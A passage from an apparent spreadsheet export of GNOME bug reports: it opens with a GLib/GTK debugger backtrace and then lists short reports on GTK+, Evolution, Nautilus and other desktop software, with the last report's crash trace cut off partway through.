        v_ulong = 135855848 v_int64 = 135855848 v_uint64 = 135855848 v_float = 4.6040477e-34 
        v_double = 6.7121707283430223e-316 v_pointer = 0x818fee8} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 136899456 data = {{
        v_int = -1215406092 v_uint = 3079561204 v_long = -1215406092 v_ulong = 3079561204 
        v_int64 = -5220110395304419340 v_uint64 = 13226633678405132276 v_float = -1.69724008e-05 
        v_double = -4.3682692727674463e-41 v_pointer = 0xb78e5ff4} {v_int = 136899456 v_uint = 136899456 
        v_long = 136899456 v_ulong = 136899456 v_int64 = -4643216541441528960 v_uint64 = 13803527532268022656 
        v_float = 5.083249e-34 v_double = -0.015615761517542515 v_pointer = 0x828eb80}}} {g_type = 3078674432 data = {
      {v_int = -1215401664 v_uint = 3079565632 v_long = -1215401664 v_ulong = 3079565632 
        v_int64 = 587978689439756608 v_uint64 = 587978689439756608 v_float = -1.69804553e-05 
        v_double = 2.3585264797503217e-269 v_pointer = 0xb78e7140} {v_int = 136899612 v_uint = 136899612 
        v_long = 136899612 v_ulong = 136899612 v_int64 = -4643214960893563876 v_uint64 = 13803529112815987740 
        v_float = 5.08332063e-34 v_double = -0.015618503331202453 v_pointer = 0x828ec1c}}} {g_type = 3213884184 
    data = {{v_int = 136899448 v_uint = 136899448 v_long = 136899448 v_ulong = 136899448 
        v_int64 = 587978686497090424 v_uint64 = 587978686497090424 v_float = 5.08324532e-34 
        v_double = 2.3585254902974893e-269 v_pointer = 0x828eb78} {v_int = -1081082728 v_uint = 3213884568 
        v_long = -1081082728 v_ulong = 3213884568 v_int64 = -4643216538364543848 v_uint64 = 13803527535345007768 
        v_float = -1.12489605 v_double = -0.015615766855260824 v_pointer = 0xbf8ffc98}}} {g_type = 3075673468 data = {
      {v_int = 136899456 v_uint = 136899456 v_long = 136899456 v_ulong = 136899456 v_int64 = -4643214960893564032 
        v_uint64 = 13803529112815987584 v_float = 5.083249e-34 v_double = -0.015618503331202183 
        v_pointer = 0x828eb80} {v_int = -1081083064 v_uint = 3213884232 v_long = -1081083064 v_ulong = 3213884232 
        v_int64 = -5238612989727212728 v_uint64 = 13208131083982338888 v_float = -1.124856 
        v_double = -2.5746201033707904e-42 v_pointer = 0xbf8ffb48}}} {g_type = 136899456 data = {{v_int = -1081082728 
        v_uint = 3213884568 v_long = -1081082728 v_ulong = 3213884568 v_int64 = -4643216332206113640 
        v_uint64 = 13803527741503437976 v_float = -1.12489605 v_double = -0.015616124483129476 
        v_pointer = 0xbf8ffc98} {v_int = -1219746028 v_uint = 3075221268 v_long = -1219746028 v_ulong = 3075221268 
        v_int64 = -5234929166351325420 v_uint64 = 13211814907358226196 v_float = -1.21684461e-05 
        v_double = -4.6268486406710409e-42 v_pointer = 0xb74c2714}}} {g_type = 137356560 data = {{v_int = -1081083048 
        v_uint = 3213884248 v_long = -1081083048 v_ulong = 3213884248 v_int64 = -5238738656175326376 
        v_uint64 = 13208005417534225240 v_float = -1.1248579 v_double = -2.5345804629726707e-42 
        v_pointer = 0xbf8ffb58} {v_int = 137356588 v_uint = 137356588 v_long = 137356588 v_ulong = 137356588 
        v_int64 = 137356588 v_uint64 = 137356588 v_float = 5.29315372e-34 v_double = 6.7863171360770015e-316 
        v_pointer = 0x82fe52c}}} {g_type = 3213885144 data = {{v_int = -1218861368 v_uint = 3076105928 
        v_long = -1218861368 v_ulong = 3076105928 v_int64 = 589941936167167688 v_uint64 = 589941936167167688 
        v_float = -1.29730397e-05 v_double = 3.0186557345752718e-269 v_pointer = 0xb759a6c8} {v_int = -1081082968 
        v_uint = 3213884328 v_long = -1081082968 v_ulong = 3213884328 v_int64 = 54753491880 v_uint64 = 54753491880 
        v_float = -1.12486744 v_double = 2.7051819327755648e-313 v_pointer = 0xbf8ffba8}}} {g_type = 3075319813 
    data = {{v_int = -1081082360 v_uint = 3213884936 v_long = -1081082360 v_ulong = 3213884936 
        v_int64 = -4643215971428860408 v_uint64 = 13803528102280691208 v_float = -1.12493992 
        v_double = -0.015616750331900256 v_pointer = 0xbf8ffe08} {v_int = 12 v_uint = 12 v_long = 12 v_ulong = 12 
        v_int64 = 51539607564 v_uint64 = 51539607564 v_float = 1.68155816e-44 v_double = 2.5463949497512056e-313 
        v_pointer = 0xc}}} {g_type = 78848 data = {{v_int = -1081082968 v_uint = 3213884328 v_long = -1081082968 
        v_ulong = 3213884328 v_int64 = 3213884328 v_uint64 = 3213884328 v_float = -1.12486744 
        v_double = 1.5878698361723806e-314 v_pointer = 0xbf8ffba8} {v_int = 1073741824 v_uint = 1073741824 
        v_long = 1073741824 v_ulong = 1073741824 v_int64 = 1073741824 v_uint64 = 1073741824 v_float = 2 
        v_double = 5.3049894774131808e-315 v_pointer = 0x40000000}}} {g_type = 1076887552 data = {{
        v_int = -1081082844 v_uint = 3213884452 v_long = -1081082844 v_ulong = 3213884452 v_int64 = 1034006035492 
        v_uint64 = 1034006035492 v_float = -1.12488222 v_double = 5.1086685972910188e-312 v_pointer = 0xbf8ffc24} {
        v_int = 18 v_uint = 18 v_long = 18 v_ulong = 18 v_int64 = 171798691858 v_uint64 = 171798691858 
        v_float = 2.52233724e-44 v_double = 8.4879831647504074e-313 v_pointer = 0x12}}} {g_type = 49 data = {{
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4611686018427387904 v_uint64 = 4611686018427387904 
        v_float = 0 v_double = 2 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 4625196817309499392 v_uint64 = 4625196817309499392 v_float = 0 v_double = 16 v_pointer = 0x0}}} {
    g_type = 76 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4622945017495814144 
        v_uint64 = 4622945017495814144 v_float = 0 v_double = 12 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 4625196817309499392 v_uint64 = 4625196817309499392 v_float = 0 v_double = 16 
        v_pointer = 0x0}}} {g_type = 78 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 4624633867356078080 v_uint64 = 4624633867356078080 v_float = 0 v_double = 15 v_pointer = 0x0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4625196817309499392 v_uint64 = 4625196817309499392 
        v_float = 0 v_double = 16 v_pointer = 0x0}}} {g_type = 82 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 4626885667169763328 v_uint64 = 4626885667169763328 v_float = 0 v_double = 22 
        v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4625196817309499392 
        v_uint64 = 4625196817309499392 v_float = 0 v_double = 16 v_pointer = 0x0}}} {g_type = 81 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4629137466983448576 v_uint64 = 4629137466983448576 v_float = 0 
        v_double = 30 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4625196817309499392 
        v_uint64 = 4625196817309499392 v_float = 0 v_double = 16 v_pointer = 0x0}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbf8ffae0
	node = (SignalNode *) 0x80d90f0
	i = 3075673468
	n_params = 0
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#17 0xb79dca09 in IA__g_signal_emit (instance=0x818fee8 signal_id=96 detail=0)
    at /build/buildd/glib2.0-2.14.1/gobject/gsignal.c:2243
	var_args = 0xbf8ffd0c Â¼Ã\236Â·xÂ¦\237Â·Ã¨Ã¾\030\b(Ã½\217Â¿\216Â¬ÂµÂ·Ã¨Ã¾\030\bPÂ¬ÂµÂ·HÃ½\217Â¿\t|\235Â·Ã¨Ã¾\030\bÃ¨\020\r\b 
#18 0xb7b59057 in IA__gtk_button_clicked (button=0x818fee8) at /build/buildd/gtk+2.0-2.12.0/gtk/gtkbutton.c:889
	__PRETTY_FUNCTION__ = IA__gtk_button_clicked
#19 0xb7b5ac8e in gtk_real_button_released (button=0x818fee8) at /build/buildd/gtk+2.0-2.12.0/gtk/gtkbutton.c:1484
No locals.
#20 0xb79d7c09 in IA__g_cclosure_marshal_VOID__VOID (closure=0x80da4b0 return_value=0x0 n_param_values=1 
    param_values=0xbf8fff8c invocation_hint=0xbf8ffe9c marshal_data=0xb7b5ac50)
    at /build/buildd/glib2.0-2.14.1/gobject/gmarshal.c:77
	data1 = (gpointer) 0x818fee8
	data2 = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__VOID
#21 0xb79c8f89 in g_type_class_meta_marshal (closure=0x80da4b0 return_value=0x0 n_param_values=1 
    param_values=0xbf8fff8c invocation_hint=0xbf8ffe9c marshal_data=0x1a4)
    at /build/buildd/glib2.0-2.14.1/gobject/gclosure.c:567
	callback = 
#22 0xb79ca772 in IA__g_closure_invoke (closure=0x80da4b0 return_value=0x0 n_param_values=1 param_values=0xbf8fff8c 
    invocation_hint=0xbf8ffe9c) at /build/buildd/glib2.0-2.14.1/gobject/gclosure.c:490
	marshal = (GClosureMarshal) 0xb79c8f40 
	marshal_data = (gpointer) 0x1a4
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#23 0xb79db7ba in signal_emit_unlocked_R (node=0x80da4d8 detail=0 instance=0x818fee8 emission_return=0x0 
    instance_and_params=0xbf8fff8c) at /build/buildd/glib2.0-2.14.1/gobject/gsignal.c:2370
	tmp = 
	handler = (Handler *) 0xbf8ffe68
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbf900354 instance = 0x818fee8 ihint = {signal_id = 95 detail = 0 
    run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN chain_type = 135074024}
	class_closure = (GClosure *) 0x80da4b0
	handler_list = (Handler *) 0x0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
      v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
      v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 95
	max_sequential_handler_number = 1059
	return_value_altered = 0
#24 0xb79dc847 in IA__g_signal_emit_valist (instance=0x818fee8 signal_id=95 detail=0 
    var_args=0xbf9001cc Â¼Ã\236Â·Â¼\220Ã¥Â· \221ÂµÂ·Ã¨\001\220Â¿A\221ÂµÂ·Ã¨Ã¾\030\b \221ÂµÂ·\b\002\220Â¿Ãž!ÃƒÂ·Ã¨Ã¾\030\b\210Ã¶-\b Â«\f\bxÂ¦\237Â·L\004\220Â¿PF\r\b8\002\220Â¿\211\217\234Â·PF\r\bp\003\220Â¿\002) at /build/buildd/glib2.0-2.14.1/gobject/gsignal.c:2199
	_flags = 
	_vtable = 
	_cvalues = {{v_int = 2 v_long = 2 v_int64 = 8589934594 v_double = 4.2439915829186759e-314 v_pointer = 0x2} {
    v_int = 2 v_long = 2 v_int64 = 8589934594 v_double = 4.2439915829186759e-314 v_pointer = 0x2} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 81 v_long = 81 v_int64 = 77309411409 
    v_double = 3.8195924277394219e-313 v_pointer = 0x51} {v_int = 12 v_long = 12 v_int64 = 4294967308 
    v_double = 2.1219957968940601e-314 v_pointer = 0xc} {v_int = 136446680 v_long = 136446680 v_int64 = 136446680 
    v_double = 6.7413617077093898e-316 v_pointer = 0x82202d8} {v_int = -1214314876 v_long = -1214314876 
    v_int64 = 11670587012 v_double = 5.7660361094302437e-314 v_pointer = 0xb79f0684} {v_int = 22 v_long = 22 
    v_int64 = 661424963606 v_double = 3.2678735181952138e-312 v_pointer = 0x16}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 32769 data = {{v_int = -1081081204 v_uint = 3213886092 v_long = -1081081204 
      v_ulong = 3213886092 v_int64 = -5207530676478279028 v_uint64 = 13239213397231272588 v_float = -1.12507772 
      v_double = -3.1148916151331426e-40 v_pointer = 0xbf90028c} {v_int = -1214471125 v_uint = 3080496171 
      v_long = -1214471125 v_ulong = 3080496171 v_int64 = -5215266806064962517 v_uint64 = 13231477267644589099 
      v_float = -1.86730958e-05 v_double = -9.0831847541005168e-41 v_pointer = 0xb79ca42b}}}
	error = 
	instance_and_params = (GValue *) 0xbf8fff8c
	stack_values = {{g_type = 135074024 data = {{v_int = 135855848 v_uint = 135855848 v_long = 135855848 
        v_ulong = 135855848 v_int64 = 135855848 v_uint64 = 135855848 v_float = 4.6040477e-34 
        v_double = 6.7121707283430223e-316 v_pointer = 0x818fee8} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 136916328 data = {{
        v_int = 2 v_uint = 2 v_long = 2 v_ulong = 2 v_int64 = -4643211387617673214 v_uint64 = 13803532686091878402 
        v_float = 2.80259693e-45 v_double = -0.015624701976776127 v_pointer = 0x2} {v_int = -1219734908 
        v_uint = 3075232388 v_long = -1219734908 v_ulong = 3075232388 v_int64 = 579079448478634628 
        v_uint64 = 579079448478634628 v_float = -1.21785597e-05 v_double = 5.9870669273967165e-270 
        v_pointer = 0xb74c5284}}} {g_type = 8 data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = 589941898731323393 v_uint64 = 589941898731323393 v_float = 1.40129846e-45 
        v_double = 3.018643147010167e-269 v_pointer = 0x1} {v_int = -1219293828 v_uint = 3075673468 
        v_long = -1219293828 v_ulong = 3075673468 v_int64 = 552831487356 v_uint64 = 552831487356 
        v_float = -1.25797196e-05 v_double = 2.7313504584191906e-312 v_pointer = 0xb7530d7c}}} {g_type = 3079455200 
    data = {{v_int = -1219734752 v_uint = 3075232544 v_long = -1219734752 v_ulong = 3075232544 
        v_int64 = 585761610137359136 v_uint64 = 585761610137359136 v_float = -1.21787016e-05 
        v_double = 1.6130476322142056e-269 v_pointer = 0xb74c5320} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data = {{
        v_int = 136383240 v_uint = 136383240 v_long = 136383240 v_ulong = 136383240 v_int64 = -5219891131577201912 
        v_uint64 = 13226852942132349704 v_float = 4.84621423e-34 v_double = -4.4800475992425942e-41 
        v_pointer = 0x8210b08} {v_int = -1081081848 v_uint = 3213885448 v_long = -1081081848 v_ulong = 3213885448 
        v_int64 = -5238280078222163960 v_uint64 = 13208463995487387656 v_float = -1.12500095 
        v_double = -2.680691828534015e-42 v_pointer = 0xbf900008}}} {g_type = 1 data = {{v_int = 137357432 
        v_uint = 137357432 v_long = 137357432 v_ulong = 137357432 v_int64 = -4643210975163455368 
        v_uint64 = 13803533098546096248 v_float = 5.29354126e-34 v_double = -0.015625834941581179 
        v_pointer = 0x82fe878} {v_int = -1219293828 v_uint = 3075673468 v_long = -1219293828 v_ulong = 3075673468 
        v_int64 = 585761558598192508 v_uint64 = 585761558598192508 v_float = -1.25797196e-05 
        v_double = 1.6130303024964552e-269 v_pointer = 0xb7530d7c}}} {g_type = 3079561204 data = {{
        v_int = -1215401664 v_uint = 3079565632 v_long = -1215401664 v_ulong = 3079565632 
        v_int64 = 589941936170627392 v_uint64 = 589941936170627392 v_float = -1.69804553e-05 
        v_double = 3.0186557357385754e-269 v_pointer = 0xb78e7140} {v_int = -1081081784 v_uint = 3213885512 
        v_long = -1081081784 v_ulong = 3213885512 v_int64 = -5223938070024290232 v_uint64 = 13222806003685261384 
        v_float = -1.12500858 v_double = -2.4169612296722485e-41 v_pointer = 0xbf900048}}} {g_type = 3079565632 
    data = {{v_int = 137356560 v_uint = 137356560 v_long = 137356560 v_ulong = 137356560 
        v_int64 = -5236827115337292528 v_uint64 = 13209916958372259088 v_float = 5.29314086e-34 
        v_double = -3.417405769756545e-42 v_pointer = 0x82fe510} {v_int = 137356560 v_uint = 137356560 
        v_long = 137356560 v_ulong = 137356560 v_int64 = -4643210906443979504 v_uint64 = 13803533167265572112 
        v_float = 5.29314086e-34 v_double = -0.015626073360157255 v_pointer = 0x82fe510}}} {g_type = 137356552 
    data = {{v_int = 137356568 v_uint = 137356568 v_long = 137356568 v_ulong = 137356568 v_int64 = 137356568 
        v_uint64 = 137356568 v_float = 5.29314453e-34 v_double = 6.7863161479457098e-316 v_pointer = 0x82fe518} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = -5236827115474649088 v_uint64 = 13209916958234902528 
        v_float = 0 v_double = -3.4174056822278951e-42 v_pointer = 0x0}}} {g_type = 137356560 data = {{
        v_int = 137356588 v_uint = 137356588 v_long = 137356588 v_ulong = 137356588 v_int64 = -4643210700285549268 
        v_uint64 = 13803533373424002348 v_float = 5.29315372e-34 v_double = -0.015626788615894657 
        v_pointer = 0x82fe52c} {v_int = -1219738032 v_uint = 3075229264 v_long = -1219738032 v_ulong = 3075229264 
        v_int64 = 589941936166291024 v_uint64 = 589941936166291024 v_float = -1.21757184e-05 
        v_double = 3.0186557342804991e-269 v_pointer = 0xb74c4650}}} {g_type = 135865784 data = {{v_int = -1081081736 
        v_uint = 3213885560 v_long = -1081081736 v_ulong = 32138855</t>
  </si>
  <si>
    <t>GTK+-154390</t>
  </si>
  <si>
    <t>gtkfilechooserbutton trailing / in select-folder mode</t>
  </si>
  <si>
    <t>In GTK_FILE_CHOOSER_ACTION_SELECT_FOLDER mode the file chooser button should
show the directory's name without the trailing '/'.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-315505</t>
  </si>
  <si>
    <t>Duplicated entry for screensaver when both xscreensaver and gnome-screensaver are installed</t>
  </si>
  <si>
    <t>Please describe the problem:
If both xscreensaver and gnome-screensaver are installed the control center
shell shows two entries for screensaver while only one is used
(gnome-screensaver by default if installed)
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GTK+-65002</t>
  </si>
  <si>
    <t>GtkCList - rows not tall enough - descenders clipped</t>
  </si>
  <si>
    <t>In GtkCList the rows do not appear to be tall enough.
The descenders of letters are clipped. (like the bottom of 'g')</t>
  </si>
  <si>
    <t>damon</t>
  </si>
  <si>
    <t>EVOLUTION-251905</t>
  </si>
  <si>
    <t>settings UI misbehaving</t>
  </si>
  <si>
    <t>Changing options (like IMAP show only subscribed folders) does not enable
the Apply button.
$ rpm -q evolution1.5 evolution-data-server
evolution1.5-1.5.0.200312052139-0.snap.ximian.6.1
evolution-data-server-0.0.1.0.200312052139-0.snap.ximian.6.1</t>
  </si>
  <si>
    <t>NAUTILUS-357468</t>
  </si>
  <si>
    <t>Paste into option blinks on context menu for remote folders.</t>
  </si>
  <si>
    <t>Intermittent I'd say it happens about 75% of the time.
I open the context menu on the desktop and after a very short random period (less than a second usually) the Paste option will enable and disable itself very quickly giving a noticeable flash.
Something is very wrong. :P</t>
  </si>
  <si>
    <t>GTKMM-160244</t>
  </si>
  <si>
    <t>Long filenames are not correctly distributed.</t>
  </si>
  <si>
    <t>Because GNU automake uses the v7 tar format there is a maximum pathname length
of 99 characters.  Filenames longer than this get the pathname truncated and
placed in the root directory of the tarfile.
Automake 1.9.3 allows one to select a newer tar format.  The attached patch
illustrates how to implement this.</t>
  </si>
  <si>
    <t>DEVILSPIE-327741</t>
  </si>
  <si>
    <t>DEVILSPIE</t>
  </si>
  <si>
    <t>Doesn't build with new glib</t>
  </si>
  <si>
    <t>Fails to build with new GLib as GMemPool is deprecated.</t>
  </si>
  <si>
    <t>devilspie-maint</t>
  </si>
  <si>
    <t>GTK+-312054</t>
  </si>
  <si>
    <t>Doing Create Folder while save dialog is reading a directory causes confusion</t>
  </si>
  <si>
    <t>If the Create Folder button in the save dialog is hit while GIMP is busy
reading the contents of a large directory then the new unnamed folder appears
in the file list while the focus goes essentially nowhere. It *looks* like the
filename input is in focus but typing does nothing. It is necessary to
double-click on the unnamed folder to actually type the name of it in.
The following error is also printed to stdout:
(gimp:6278): Gtk-CRITICAL **: gtk_tree_view_scroll_to_cell: assertion
`tree_view-&gt;priv-&gt;model != NULL' failed
(gimp:6278): Gtk-CRITICAL **: gtk_tree_row_reference_new_proxy: assertion
`GTK_IS_TREE_MODEL (model)' failed</t>
  </si>
  <si>
    <t>radsaq</t>
  </si>
  <si>
    <t>GTK-ENGINES-337381</t>
  </si>
  <si>
    <t>GtkHScale is improperly displayed in RTL</t>
  </si>
  <si>
    <t>Please describe the problem:
When in RTL the handle is right aligned (as it should be) but the fill line is
left aligned (should be also right aligned)
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>remenic</t>
  </si>
  <si>
    <t>yairhr</t>
  </si>
  <si>
    <t>EVOLUTION-325839</t>
  </si>
  <si>
    <t>Error message while creating duplicate mail folder is wrong</t>
  </si>
  <si>
    <t>Create a folder 'On this Computer'
Create one more folder with same name on clicking 'Create' button in create folder dialog throws error message 'No such file or directory'.
Reproducible always.</t>
  </si>
  <si>
    <t>pnayak</t>
  </si>
  <si>
    <t>EKIGA-369202</t>
  </si>
  <si>
    <t>The account table should have a proper title for blind access.</t>
  </si>
  <si>
    <t>Please describe the problem:
This is an a11y bug for ekiga blind access.
Steps to reproduce:
1. Launch orca and ekiga.
2. Select top menu Edit-&gt;Accounts.
3. Press Tab to move focus to the account table.
Actual results:
The orca reports this table with table only.
Expected results:
The table should have a proper title for blind access so that orca could report this table with a meaningful name.
Does this happen every time?
Yes.
Other information:
No.</t>
  </si>
  <si>
    <t>patrick.wade</t>
  </si>
  <si>
    <t>tim.miao</t>
  </si>
  <si>
    <t>NAUTILUS-318373</t>
  </si>
  <si>
    <t>rename looses focus after directory change</t>
  </si>
  <si>
    <t>How to repeat:
mkdir test_dir
touch test_dir/rename_me
nautilus test_dir &amp;
while :  do touch test_dir/changed_file  sleep 1  rm test_dir/changed_file 
sleep 1  done
Now try to rename file rename_me. It's impossible because it looses focus every
second.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-37741</t>
  </si>
  <si>
    <t>had the control center open....</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.2
Synopsis: had the control center open....
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25
gnome-core: gnome-core 1.2.4
Description:
I was doing a find with the control center open.  I used ctr-'c' to
stop.
I moved a directory and its contents and then this happened -- It
happened after I did this stuff at a time when I wasn't doing anything
in particular at all.		
Debugging information:
0x404e08e9 in __wait4 () from /lib/libc.so.6
#0  0x404e08e9 in __wait4 () from /lib/libc.so.6
#1  0x4053f1ec in ?? () from /lib/libc.so.6
#2  0x40145781 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x4046dc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x404a8fba in __libc_free (mem=0x8168698) at malloc.c:3023
#5  0x4008536d in g_free () from /usr/lib/libglib-1.2.so.0
#6  0x40083ae0 in g_source_destroy_func () from /usr/lib/libglib-1.2.so.0
#7  0x400817b3 in g_hook_free () from /usr/lib/libglib-1.2.so.0
#8  0x40081aa8 in g_hook_unref () from /usr/lib/libglib-1.2.so.0
#9  0x4008420e in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#10 0x40084751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#11 0x400848f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#12 0x402868e9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#13 0x804ec32 in control_center_corba_gtk_main ()
#14 0x804daf8 in main ()
#15 0x404679cb in __libc_start_main (main=0x804dab0  argc=1 
    argv=0xbffffb24 init=0x804c148  fini=0x80517cc  
    rtld_fini=0x4000ae60  stack_end=0xbffffb1c)
    at ../sysdeps/generic/libc-start.c:92
#0  0x404e08e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4053f1ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40145781 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x4046dc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x404a8fba in __libc_free (mem=0x8168698) at malloc.c:3023
mem = (void *) 0xbffff848
ar_ptr = (arena *) 0x8168690
p = 0x3a635f1a
#5  0x4008536d in g_free () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#6  0x40083ae0 in g_source_destroy_func () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x400817b3 in g_hook_free () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:48 -------
This bug was previously known as bug 37741 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=37741
Originally filed under the control-center product and general component.
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (chrisd@better-investing.org) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>chrisd</t>
  </si>
  <si>
    <t>GIMP-467933</t>
  </si>
  <si>
    <t>Internationalisation</t>
  </si>
  <si>
    <t>Re_vert Zoom not translatable</t>
  </si>
  <si>
    <t>Re_vert Zoom in View/Zoom is not translatable if greyed out (zoom was not yet changed). All translatable strings are translated but this item remains English.</t>
  </si>
  <si>
    <t>jfriedl</t>
  </si>
  <si>
    <t>GALEON-72535</t>
  </si>
  <si>
    <t>Inconsistent order of buttons</t>
  </si>
  <si>
    <t>In the dialog where galeon asks whether to save a file to a disk or to
view with helper application the order of Cancel and OK buttons is
inconsistent with other dialogs.
In the said dialog the order is Cancel-OK whereas in for example Open
Sessions dialog the order is OK-Cancel and in print dialog
Print-Preview-Cancel.
The button order is wrong also in the Persistent Data Manager window. 
There may be others but those two were the ones I noticed.
To make it clear I think the order OK-Cancel (Yes-No Apply-Abandon)
should be used in all dialogs.  I don't know if this contradicts the GNOME2
guidelines and frankly I don't really care which one is used as long as
either one is used consistently.</t>
  </si>
  <si>
    <t>dan-gnome</t>
  </si>
  <si>
    <t>EVOLUTION-200915</t>
  </si>
  <si>
    <t>PgUp and PgDown do not work in day view</t>
  </si>
  <si>
    <t>The page up and page down keys do not work in the day view widget.  They should
scroll the view by a reasonable amount.</t>
  </si>
  <si>
    <t>EVOLUTION-215882</t>
  </si>
  <si>
    <t>Message contents are blank</t>
  </si>
  <si>
    <t>Description of Problem:
Evolution displays only the headers and message contents are all blank for
all messages. This appears to be a problem with the gtkhtml. The gtkhtml
configuration is: (from ~/.gnome/gtkhtml)
[Settings]
magic_links=true
animations=true
keybindings_theme=ms
font_variable=-microsoft-verdana-medium-r-normal-*-12-*-*-*-p-*-iso8859-1
font_fixed=-*-courier-medium-r-normal-*-12-*-*-*-*-*-iso8859-1
font_variable_size=12
font_fixed_size=12
font_variable_print=-*-helvetica-*-*-*-*-12-*-*-*-*-*-*-*
font_fixed_print=-*-courier-*-*-*-*-12-*-*-*-*-*-*-*
font_variable_size_print=12
font_fixed_size_print=12
font_variable_points=false
font_fixed_points=false
font_variable_print_points=false
font_fixed_print_points=false
live_spell_check=true
spell_error_color_red=65535
spell_error_color_green=0
spell_error_color_blue=0
language=en
If font_fixed is set to the same as font_variable ( verdana ) I am able to
see the message contents but the links (http://..) overlaps the text for
plain text messages.
My machine is debian unstable updated to the latest using apt-get upgrade
yesterday but I have been seeing this problem for the past two weeks.</t>
  </si>
  <si>
    <t>nvshaji</t>
  </si>
  <si>
    <t>WEBSITE-337339</t>
  </si>
  <si>
    <t>guadec.org</t>
  </si>
  <si>
    <t>Taking out - characters in the middle of IBAN numbers</t>
  </si>
  <si>
    <t>Murray reports:
On the website when choosing Bank Transfter the IBAN number is listed
with - characters in the middle. Some online banking systems
(Hypovereinsbank in my case) will complain about them when you
copy/paste the IBAN number. I guess others systems might demand them.
You might want to mention it to avoid This IBAN doesn't work
questions.</t>
  </si>
  <si>
    <t>amesas</t>
  </si>
  <si>
    <t>qgil</t>
  </si>
  <si>
    <t>GTKMM-80489</t>
  </si>
  <si>
    <t>Gtk::Table docs not used.</t>
  </si>
  <si>
    <t>Gtk::Table isn't showing up in the Widgets or Containers groups and it
doesn't seem to be using it's reference documentation comments.</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-272863</t>
  </si>
  <si>
    <t>crash when clicking on calendar</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
evolution-exchange process crashes when i click the calendar in the main
evolution window.
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen? 
Additional Information:
stack trace from bug-buddy:
Backtrace was generated from '/usr/libexec/evolution-exchange-storage'
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1231994208 (LWP 15520)]
[New Thread -1241986128 (LWP 15557)]
[New Thread -1233450064 (LWP 15521)]
0xffffe410 in ?? ()
